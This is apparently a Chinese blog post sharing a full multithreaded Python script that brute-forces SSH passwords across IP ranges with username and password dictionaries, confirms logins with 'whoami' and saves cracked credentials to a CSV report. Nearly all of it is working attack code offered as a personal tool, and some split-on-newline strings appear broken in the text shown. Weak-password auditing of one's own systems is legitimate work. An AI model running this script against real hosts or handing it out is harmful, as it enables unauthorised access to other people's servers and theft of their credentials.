多线程sshd爆破程序代码

不多说了，直接上手代码，也没有啥练手的，都是很熟悉的代码，水一篇，方便作为工作的小工具吧。试了一下，配合一个好点的字典，还是可以作为个人小工具使用的。

#!/usr/bin/env python
# -*- coding:utf-8 -*-

'''
SSH服务弱口令扫描脚本
作者：陈然
'''

#引入包文件
import ipaddr
import logging
import datetime
import paramiko
import threading
from optparse import OptionParser

#定义全局配置
logging.basicConfig(format="%(message)s",level=logging.INFO)

#定义全局变量
username_config_file = "../config/username.conf"
password_config_file = "../config/password.conf"
username_list = []
password_list = []
target_list = []
result_list = []
multi_thread = False


#定义全局接口函数
def read_config_from_file():
    """从配置文件夹下的字典文件中读取爆破用户名和口令"""
    global username_list
    global password_list
    #读取用户名字典
    with open(username_config_file,"r") as fr:
        for line in fr.readlines():
            username = line.split("
")[0].split("
")[0]
            username_list.append(username)
    #读取口令字典
    with open(password_config_file,"r") as fr:
        for line in fr.readlines():
            password = line.split("
")[0].split("
")[0]
            password_list.append(password)
    #字典列表去重
    username_list = list(set(username_list))
    password_list = list(set(password_list))


def change_config_files(username_file=None,password_file=None):
    """指定用户名和口令的字典配置文件"""
    global username_config_file
    global password_config_file
    if username_file != None:
        username_config_file = username_file
    if password_file != None:
        password_config_file = password_file

def target_analyst(target):
    """对于目标网络地址分析并拆分其中的地址段 仅支持IPv4"""
    global target_list
    target = ipaddr.IPv4Network(target)
    hosts_list = target.iterhosts()
    for host in hosts_list:
        target_list.append(str(host))

def target_file_anylast(filename):
    """分析目标列表文件"""
    file_to_target = []
    with open(filename,"r") as fr:
        for line in fr.readlines():
            each_target = line.split("
")[0].split("
")[0]
            file_to_target.append(each_target)
    return file_to_target


def send_crack_packet(target,username,password,port=22,timeout=3):
    """发送爆破登录报文"""
    global result_list
    #局部变量
    flag = False#是否有漏洞的标志位，默认False
    #创建SSH对象并登陆
    logging.info("[+] 爆破对象 地址%s 端口:%s 用户名:%s 口令:%s"%(str(target),str(port),str(username),str(password)))
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=target, port=port, username=username, password=password,timeout=timeout,allow_agent=False,look_for_keys = False)
        #执行命令
        stdin, stdout, stderr = ssh.exec_command('whoami',timeout=timeout)
        #获取命令结果
        result = stdout.read().split("
")[0]
        if result == username:
            flag = True
            report_sting = "%s,%s,%s,%s,%s
"%(str(target),"YES",str(port),str(username),str(password))
            result_list.append(report_sting)
            logging.info("[*] 爆破成功: 详细信息[地址:%s,端口:%s,用户名:%s,口令:%s]"%(str(target),str(port),str(username),str(password)))
            try:
                if multi_thread == False:
                    continue_flag = raw_input("是否继续？[1]继续[2]退出")
                    continue_flag = int(continue_flag)
                else:
                    continue_flag = 1
            except Exception,ex:
                continue_flag = 2
            if continue_flag != 1:
                exit(0)
    except Exception,ex:
        pass
    #关闭连接
    ssh.close()
    return flag


def create_report():
    """生成报告文件"""
    time_string = str(datetime.datetime.now()).replace(" ","").replace(":","")
    fd = open("../result/%s.csv"%time_string,"w")
    fd.write("Target-IP,WEAK,PORT,USERNAME,PASSWORD
")
    for result_string in result_list:
        fd.write(result_string)
    fd.close()


def parameter_checker(parameter):
    """参数检查函数"""
    if parameter in ["",None," ","null"]:
        return False
    else:
        return True


def list_devide(object_list,count):
    """列表拆分函数"""
    return_list = []
    if not isinstance(object_list,list):
        return []
    else:
        total = len(object_list)
        size = total/count + 1
        start = 0
        end = start + size
        while True:
            if end <= total:
                return_list.append(object_list[start:end])
            elif end > total and start < total:
                return_list.append(object_list[start:])
            elif start > total:
                break
            else:
                break
            start += size
            end += size
        return return_list

class cracker(threading.Thread):
    """多线程爆破类"""
    def __init__(self,target_list,timeout):
        """多线程爆破构造函数"""
        threading.Thread.__init__(self)
        self.__target_list = target_list
        self.__timeout = timeout

    def run(self):
        for target in self.__target_list:
            for username in username_list:
                for password in password_list:
                    send_crack_packet(target=target,username=username,password=password,timeout=self.__timeout)


if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option("-a","--target",dest="target",help="Target IP Addresses!")
    parser.add_option("-i","--infile",dest="infile",help="Target IP Addresses File!")
    parser.add_option("-u","--user",dest="userfile",help="Username Dictionary File!")
    parser.add_option("-p","--pswd",dest="pswdfile",help="Password Dictionary File!")
    parser.add_option("-o","--outfile",dest="outfile",help="Create A Report File! If [Yes] Create Report!")
    parser.add_option("-n","--thread",dest="threadnum",help="Count Of Thread!")
    parser.add_option("-t","--timeout",dest="timeout",help="Timeout Of Seconds!")
    (options, arges) = parser.parse_args()
    try:
        options.threadnum = int(options.threadnum)
    except Exception,ex:
        options.threadnum = 1
    options.threadnum = 10 if options.threadnum > 10 else options.threadnum
    try:
        timeout = int(options.timeout)
    except Exception,ex:
        timeout = 3
    timeout = 60 if timeout >= 60 else timeout
    if (parameter_checker(options.target) or parameter_checker(options.infile)) == False:
        logging.error("[-] 输入参数错误!!!")
        exit(0)
    logging.info("[+] 目标初始化...")
    if options.infile != None:
        ret = target_file_anylast(options.infile)
        for item in ret:
            if item.find("/") >= 0 or item.find("-") >= 0:
                target_analyst(item)
            else:
                target_list.append(item)
    if options.target != None:
        if options.target.find("/") >= 0 or options.target.find("-") >= 0:
            target_analyst(options.target)
        else:
            target_list.append(options.target)
    logging.info("[+] 目标初始化完成!!!")
    if (parameter_checker(options.userfile) or parameter_checker(options.pswdfile)) == True:
        logging.info("[+] 配置字典文件!!!")
        change_config_files(username_file=options.userfile,password_file=options.pswdfile)
    read_config_from_file()
    logging.info("[+] 开始扫描")
    #单线程爆破
    if options.threadnum == 1:
        for target in target_list:
            for username in username_list:
                for password in password_list:
                    send_crack_packet(target=target,username=username,password=password,timeout=timeout)
    #多线程爆破
    else:
        multi_thread = True
        thread_list = []
        thread_target_list = list_devide(target_list,options.threadnum)
        for thread_target in thread_target_list:
            thread_object = cracker(thread_target,timeout)
            thread_list.append(thread_object)
        for thread in thread_list:
            thread.start()
        for thread in thread_list:
            thread.join()
    if parameter_checker(options.outfile) and options.outfile == "yes":
        logging.info("[+] 生成报告中...")
        create_report()
        logging.info("[+] 报告已生成!!!")
    logging.info("[+] 扫描完成")